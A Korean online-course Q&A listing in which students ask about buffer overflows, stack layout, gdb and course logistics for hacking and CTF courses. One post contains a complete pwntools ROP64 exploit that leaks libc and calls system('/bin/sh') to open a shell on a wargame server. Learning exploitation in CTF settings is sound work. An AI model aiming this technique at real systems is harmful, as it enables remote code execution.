묻고 답해요
169만명의 커뮤니티!! 함께 토론해봐요.
인프런 TOP Writers
-
해결됨해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
rop64 뭐가 잘못 됐을까요..?
from pwn import * context.log_level = 'debug' p = remote("war.knock-on.org", 45240) e = ELF("./rop64") libc = ELF("./libc.so.6") rdi = 0x0000000000401176 payload = b'a' * 0x28 payload += p64(rdi) payload += p64(e.got['read']) payload += p64(e.plt['puts']) payload += p64(e.symbols['main']) p.sendafter("name?\n", payload) read_got = u64(p.recvline().strip(b'\n')+b'\x00\x00') libc_base = read_got - libc.symbols['read'] print(f"read_got: {hex(read_got)}") print(f"libc_base: {hex(read_got)}") binsh = libc_base + 0x1d8678 system_got = libc_base + libc.symbols['system'] ret = 0x000000000040101a payload = b'a' * 0x28 payload += p64(rdi) payload += p64(binsh) payload += p64(ret) payload += p64(system_got) pause() p.sendafter("name?\n", payload) p.interactive()
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
rop64 질문입니다
여기서 flag를 ls 입력하면 나와야 되지 않나요..? 왜 안나오는지 모르겠어요
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
bof3 문제 관련 질문
이렇게 코드를 짜고 쉘을 땃는데 ls하면 안 나와요 왜 그런가요?
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
bof2 문제 페이로드 관련 질문
스택이 정렬이 되지 않은걸 리턴 함수를 다시 콜하면 왜 해결되나요?
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
bof1 마지막 파이썬 실행
마지막에 왜 python3 exp.py가 실행이 안돼는지 모르겠어요, ai말고 답변 달아주시면 감사하겠습니다!!
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
bof1 마지막에 질문 있아요
여기서 왜 안 될까요?그리고 자꾸 서버에 연결이 안돼요...
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
bof로 변수 조작
강의에서 a를 28개 입력하자 실패, 29개 입력하자 성공이 나왔는데 28개도 실패가 나와야 하지 않나요? 체크는 버프 저장 값 다음에 위치하고 체크에 값이 0이 아니면 성공이니 25개의 a를 넣으면 성공 아닌가요?
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
체크의 위치
왜 체크가 16바이트 중 4바이트라고 뒤에 저장 되나요?
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
패딩과 체크
패딩은 빈 공간을 채우기 위해 사용한다고 gpt가 그러는데 맞을까요?그리고 이 경우 stack의 sfp와 ret은 뭔가요?
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
스택의 구조에 대한 질문 입니다.
gdb로 스택의 구조를 확인하는 부분에서 어디가 버퍼인지는 들어가는 값을 보고 알거 같은데 sfp, ret은 뭘 보고 해당 부분이 sfp나 ret인지 알 수 있는 지 모르겠습니다.
-
해결됨해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
Rev-basic-2 문제 파일
리버스 베이직 2 문제 파일을 다운 받고 ida에서 디컴파일 했더니 소스코드가 베이직1이랑 같은 값이 나왔고 3파일도 같은 소스코드가 나왔어요.왜 그런가요...ㅠ
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
강의 속 버블 파일은 어디서 받을 수 있나요?
핸드래이1,2는 어디서 받는지 알겠는데 버블을 어디서 받아야 하나요?
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
디스코드 참가 관련
수업에 입장하여 LMS 등록을 하기위해 Discord에 접근하고자 하니 올바르지 않은 초대장이라는 문구가 나왔습니다.Discord 공식 ( https://support.discord.com/hc/ko/articles/360001556852-%EC%9E%98%EB%AA%BB%EB%90%9C-%EC%B4%88%EB%8C%80-%EB%A7%81%ED%81%AC ) Refernce에선 티켓 만료나 인원제한이라고 나와있습니다.확인 및 해결 부탁드립니다
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
디스코드 참가
디스코드 서버에 참여하려고 하는데 디스코드 링크가 만료되거나 유효하지 않다고 하네요
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
cdecl 에서 내부가 아닌 외부 정리
add esp,0x8을 보고 어떻게 내부가 아닌 함수 외부에서 에필로그가 적히는 건지 이해가 가지 않습니다.
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
0x9와 9의 차이
0x9라고 basic-asm1 답을 입력했는데 옳지 않다고 나오고 9라고 입력하니 맞는 이유를 모르겠습니다.
-
해결됨해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
디스코드 이메일 등록 오류
여러 번 시도해도, 다음과 같은 메시지만 계속 나옵니다.등록 중 오류가 발생했습니다. 관리자에게 문의해주세요.
-
해결됨해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
수업자료는 어디서 다운받을 수 있을까요?
안녕하세요. 강의 자료 다운로드 하는 곳이 안보여서 문의드려요!
-
미해결해킹대회(CTF) 출전을 위한 시스템해킹(Pwnable) 입문
retrun 주소값에 브레이크 포인트 걸고
continue 시 thread is running error 가 뜨는데 이유와 해결법을 잘 모르겠습니다
-
미해결해킹대회(CTF) 출전을 위한 시스템해킹(Pwnable) 입문
BP실행 관련 질문드립니다
영상 2:20 부분처럼 return address부분에 브레이크가 걸린 코드가 왼쪽 화면에 떠야 하는데 왜 안 뜨는지 잘 모르겠습니다.. bp가 실행돼서 ret전까지 실행은 잘 된 것 같은데 bp 걸린 부분 까지 실행한 코드를 보려면 어떻게 해야할까요?
